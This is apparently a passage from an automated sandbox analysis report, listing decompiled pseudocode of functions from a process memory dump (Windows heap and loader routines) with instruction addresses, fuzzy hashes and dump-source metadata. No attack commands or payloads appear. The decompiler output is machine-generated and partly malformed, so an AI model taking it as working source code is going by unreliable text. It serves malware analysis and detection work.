												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L049577F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L049577F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4a27b08 =  *0x4a27b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E049757C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0497F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L049577F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0496A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L049577F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E049796C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                  0x0494849b
                                                                  0x0494849b
                                                                  0x0494849b
                                                                  0x0494849b
                                                                  0x0494849d
                                                                  0x049484a2
                                                                  0x049484a7
                                                                  0x049484b1
                                                                  0x049484d8
                                                                  0x00000000
                                                                  0x049484b3
                                                                  0x049484c4
                                                                  0x049484c9
                                                                  0x049484cd
                                                                  0x049484cf
                                                                  0x049484cf
                                                                  0x049484d6
                                                                  0x049484e6
                                                                  0x049484e9
                                                                  0x049484ec
                                                                  0x049484ef
                                                                  0x049484f2
                                                                  0x049484f4
                                                                  0x049484fc
                                                                  0x04948501
                                                                  0x04948506
                                                                  0x04948509
                                                                  0x049486e0
                                                                  0x049486e5
                                                                  0x049486e8
                                                                  0x049486ed
                                                                  0x049486f0
                                                                  0x049486f2
                                                                  0x04999afd
                                                                  0x04999b02
                                                                  0x049484da
                                                                  0x049484df
                                                                  0x049484df
                                                                  0x049486fa
                                                                  0x049486fd
                                                                  0x049486fe
                                                                  0x04948701
                                                                  0x04948706
                                                                  0x04948709
                                                                  0x0494870b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04948711
                                                                  0x04948725
                                                                  0x04948727
                                                                  0x0494872a
                                                                  0x0494872c
                                                                  0x04999af0
                                                                  0x04999af5
                                                                  0x04948732
                                                                  0x04948732
                                                                  0x04948732
                                                                  0x04948735
                                                                  0x04948737
                                                                  0x04948515
                                                                  0x04948515
                                                                  0x04948518
                                                                  0x0494851d
                                                                  0x04948537
                                                                  0x04948539
                                                                  0x0494853c
                                                                  0x0494853e
                                                                  0x0494868c
                                                                  0x04948691
                                                                  0x04948699
                                                                  0x0494869b
                                                                  0x04948744
                                                                  0x04948748
                                                                  0x049486a1
                                                                  0x049486a1
                                                                  0x049486a1
                                                                  0x049486a4
                                                                  0x049486a8
                                                                  0x04999bdf
                                                                  0x04999bdf
                                                                  0x049486ae
                                                                  0x049486b0
                                                                  0x00000000
                                                                  0x049486b6
                                                                  0x00000000
                                                                  0x04999be9
                                                                  0x049486b0
                                                                  0x04948544
                                                                  0x0494854a
                                                                  0x0494854d
                                                                  0x04948551
                                                                  0x0494876e
                                                                  0x04948778
                                                                  0x0494877b
                                                                  0x04948780
                                                                  0x04948557
                                                                  0x04948557
                                                                  0x0494855d
                                                                  0x0494855d
                                                                  0x0494856b
                                                                  0x0494856e
                                                                  0x04948570
                                                                  0x04948573
                                                                  0x04948576
                                                                  0x04948576
                                                                  0x04948579
                                                                  0x0494857b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04948581
                                                                  0x049485a0
                                                                  0x049485a2
                                                                  0x049485a5
                                                                  0x049485a7
                                                                  0x04999b1b
                                                                  0x04999b1b
                                                                  0x0494862e
                                                                  0x0494862e
                                                                  0x04948631
                                                                  0x04948631
                                                                  0x04948634
                                                                  0x04948636
                                                                  0x04948669
                                                                  0x04948669
                                                                  0x0494866b
                                                                  0x04999bbf
                                                                  0x04999bc4
                                                                  0x04999bc8
                                                                  0x04999bce
                                                                  0x04999bce
                                                                  0x04948671
                                                                  0x04948671
                                                                  0x04948674
                                                                  0x04948676
                                                                  0x04999bae
                                                                  0x04999bae
                                                                  0x04948676
                                                                  0x0494867c
                                                                  0x0494867e
                                                                  0x04948688
                                                                  0x04948688
                                                                  0x00000000
                                                                  0x0494867e
                                                                  0x04948638
                                                                  0x04948638
                                                                  0x0494863b
                                                                  0x0494863e
                                                                  0x0494863f
                                                                  0x04948642
                                                                  0x04948645
                                                                  0x04948648
                                                                  0x0494864d
                                                                  0x04999b69
                                                                  0x04999b6e
                                                                  0x04999b7b
                                                                  0x04999b81
                                                                  0x04999b85
                                                                  0x04999b89
                                                                  0x04999ba7
                                                                  0x04999b8b
                                                                  0x04999b91
                                                                  0x04999b9a
                                                                  0x04999b9f
                                                                  0x04999b9f
                                                                  0x04948788
                                                                  0x0494878d
                                                                  0x04948763
                                                                  0x04948763
                                                                  0x04948766
                                                                  0x00000000
                                                                  0x04948766
                                                                  0x04999b70
                                                                  0x00000000
                                                                  0x04999b70
                                                                  0x04948656
                                                                  0x0494865a
                                                                  0x0494865c
                                                                  0x04948752
                                                                  0x04948756
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494875e
                                                                  0x00000000
                                                                  0x0494875e
                                                                  0x04948662
                                                                  0x04948662
                                                                  0x04948662
                                                                  0x04948666
                                                                  0x00000000
                                                                  0x04948666
                                                                  0x049485b7
                                                                  0x049485b9
                                                                  0x049485bc
                                                                  0x049485bf
                                                                  0x049485cc
                                                                  0x049485d1
                                                                  0x049485d4
                                                                  0x049485db
                                                                  0x049485de
                                                                  0x049485e0
                                                                  0x04999b5f
                                                                  0x00000000
                                                                  0x04999b5f
                                                                  0x049485e6
                                                                  0x049485ea
                                                                  0x049486c3
                                                                  0x049486c5
                                                                  0x049486c8
                                                                  0x049486ca
                                                                  0x04999b16
                                                                  0x00000000
                                                                  0x04999b16
                                                                  0x049486d6
                                                                  0x049485f6
                                                                  0x049485f6
                                                                  0x049485f9
                                                                  0x04948602
                                                                  0x04948606
                                                                  0x0494860a
                                                                  0x0494860b
                                                                  0x0494860e
                                                                  0x04948611
                                                                  0x00000000
                                                                  0x04948611
                                                                  0x049485f3
                                                                  0x00000000
                                                                  0x049485f3
                                                                  0x04948619
                                                                  0x0494861e
                                                                  0x0494861e
                                                                  0x04948621
                                                                  0x04948622
                                                                  0x04948623
                                                                  0x04948625
                                                                  0x0494862c
                                                                  0x00000000
                                                                  0x0494873d
                                                                  0x00000000
                                                                  0x0494873d
                                                                  0x04948737
                                                                  0x0494850f
                                                                  0x04948512
                                                                  0x00000000
                                                                  0x04948512
                                                                  0x00000000
                                                                  0x049484d6

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64c8dd7944fda016ca3e07e211755c9926001437e956d98f255997a297a9694f
                                                                  • Instruction ID: b1e3d5aae246f8009afbf6c0bef51f40ce73eaf8b0c3bedca75842db7bfa5350
                                                                  • Opcode Fuzzy Hash: 64c8dd7944fda016ca3e07e211755c9926001437e956d98f255997a297a9694f
                                                                  • Instruction Fuzzy Hash: 34B118B8E00209DFDB24EF99C984EADBBBABF88304F104529E405AB655D774BD41DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496513A, Relevance: .3, Instructions: 258COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 67%
                                                                  			E0496513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4a2d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0497D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04952280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04954620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0497F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0494FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4a2b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0497B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                  0x04965142
                                                                  0x0496514c
                                                                  0x04965150
                                                                  0x04965157
                                                                  0x04965159
                                                                  0x0496515e
                                                                  0x04965165
                                                                  0x04965169
                                                                  0x0496516c
                                                                  0x04965172
                                                                  0x04965176
                                                                  0x0496517a
                                                                  0x0496517a
                                                                  0x0496517a
                                                                  0x0496517f
                                                                  0x049a6d8b
                                                                  0x049a6d8e
                                                                  0x049a6d91
                                                                  0x049a6d95
                                                                  0x049a6d98
                                                                  0x049a6d9c
                                                                  0x049a6da0
                                                                  0x049a6da3
                                                                  0x049a6da7
                                                                  0x049a6e26
                                                                  0x049a6e26
                                                                  0x049a6e2a
                                                                  0x049651f9
                                                                  0x049651f9
                                                                  0x049651fe
                                                                  0x049a6e33
                                                                  0x049a6e33
                                                                  0x049a6e39
                                                                  0x049a6e3d
                                                                  0x049a6e46
                                                                  0x049a6e50
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6e52
                                                                  0x049a6e53
                                                                  0x049a6e56
                                                                  0x049a6e5d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6e5f
                                                                  0x049a6e67
                                                                  0x049a6e77
                                                                  0x049a6e7f
                                                                  0x049a6e80
                                                                  0x049a6e88
                                                                  0x049a6e90
                                                                  0x049a6e9f
                                                                  0x049a6ea5
                                                                  0x049a6ea9
                                                                  0x049a6eb1
                                                                  0x049a6ebf
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6ecf
                                                                  0x049a6ed3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6edb
                                                                  0x049a6ede
                                                                  0x049a6ee1
                                                                  0x049a6ee8
                                                                  0x049a6eeb
                                                                  0x049a6eed
                                                                  0x049a6ef0
                                                                  0x049a6ef4
                                                                  0x049a6ef8
                                                                  0x049a6efc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6f0d
                                                                  0x049a6f11
                                                                  0x049a6f32
                                                                  0x049a6f37
                                                                  0x049a6f3b
                                                                  0x049a6f3e
                                                                  0x049a6f41
                                                                  0x049a6f46
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6f4c
                                                                  0x049a6f50
                                                                  0x049a6f50
                                                                  0x049a6f54
                                                                  0x049a6f62
                                                                  0x049a6f65
                                                                  0x049a6f6d
                                                                  0x049a6f7b
                                                                  0x049a6f7b
                                                                  0x049a6f93
                                                                  0x049a6f98
                                                                  0x049a6fa0
                                                                  0x049a6fa6
                                                                  0x049a6fb3
                                                                  0x049a6fb6
                                                                  0x049a6fbf
                                                                  0x049a6fc1
                                                                  0x049a6fd5
                                                                  0x049a6fda
                                                                  0x049a6fda
                                                                  0x049a6fdd
                                                                  0x049a6fe2
                                                                  0x049a6fe7
                                                                  0x049a6feb
                                                                  0x049a6fef
                                                                  0x049a6ff3
                                                                  0x0496520c
                                                                  0x0496520c
                                                                  0x0496520f
                                                                  0x04965215
                                                                  0x04965234
                                                                  0x0496523a
                                                                  0x0496523a
                                                                  0x04965244
                                                                  0x04965245
                                                                  0x04965246
                                                                  0x04965251
                                                                  0x04965251
                                                                  0x049a6f13
                                                                  0x049a6f17
                                                                  0x049a6f17
                                                                  0x049a6f18
                                                                  0x049a6f1b
                                                                  0x049a6f1f
                                                                  0x049a6f23
                                                                  0x00000000
                                                                  0x049a6f28
                                                                  0x04965204
                                                                  0x04965204
                                                                  0x04965208
                                                                  0x00000000
                                                                  0x04965208
                                                                  0x04965185
                                                                  0x04965188
                                                                  0x0496518a
                                                                  0x0496518e
                                                                  0x04965195
                                                                  0x049a6db1
                                                                  0x049a6db5
                                                                  0x049a6db9
                                                                  0x0496519b
                                                                  0x0496519b
                                                                  0x0496519e
                                                                  0x049651a7
                                                                  0x049651a9
                                                                  0x049651a9
                                                                  0x049651b5
                                                                  0x049651b8
                                                                  0x049651bb
                                                                  0x049651be
                                                                  0x049651c1
                                                                  0x049651c5
                                                                  0x049651c9
                                                                  0x049651cd
                                                                  0x049651cd
                                                                  0x049651d8
                                                                  0x049651dc
                                                                  0x049651e0
                                                                  0x049a6dcc
                                                                  0x049a6dd0
                                                                  0x049a6dd5
                                                                  0x049a6ddd
                                                                  0x049a6de1
                                                                  0x049a6de1
                                                                  0x049a6de5
                                                                  0x049a6deb
                                                                  0x049a6df1
                                                                  0x049a6df7
                                                                  0x049a6dfd
                                                                  0x049a6e01
                                                                  0x049a6e05
                                                                  0x049a6e09
                                                                  0x049a6e0d
                                                                  0x049a6e11
                                                                  0x049a6e11
                                                                  0x049651eb
                                                                  0x049a6e1a
                                                                  0x049a6e1f
                                                                  0x049a6e21
                                                                  0x049a6e23
                                                                  0x00000000
                                                                  0x049651f1
                                                                  0x049651f1
                                                                  0x00000000
                                                                  0x049651f1

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57e0ddfdc1213f59066c4d5ad57c1f851bfa7ff6433441228b45ecffaafe7420
                                                                  • Instruction ID: baab5fabd4a9de3994e690e6094ee1919fc2ebb1333ef533379f7930ffd3d891
                                                                  • Opcode Fuzzy Hash: 57e0ddfdc1213f59066c4d5ad57c1f851bfa7ff6433441228b45ecffaafe7420
                                                                  • Instruction Fuzzy Hash: 97C101756093819FD354CF28C580A5AFBE1BF88318F184A6EF8D98B352D771E945CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049603E2, Relevance: .3, Instructions: 254COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 74%
                                                                  			E049603E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4a2d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04960548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0497B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0494B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4a27c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04957D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04957D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E049B7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04979830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E049B69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4a27c04 != 0) {
						_t118 = _v12;
						_t120 = E049BA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4a27bd8;
						if( *0x4a27bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E049795D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E049799A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E049B3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0493B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0497AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4a28474 - 3;
										if( *0x4a28474 != 3) {
											 *0x4a279dc =  *0x4a279dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04957D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04957D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E049B7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4a28708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4a27b00; // 0x0
							asm("ror esi, cl");
							 *0x4a2b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E049795D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04947F65(_t119);
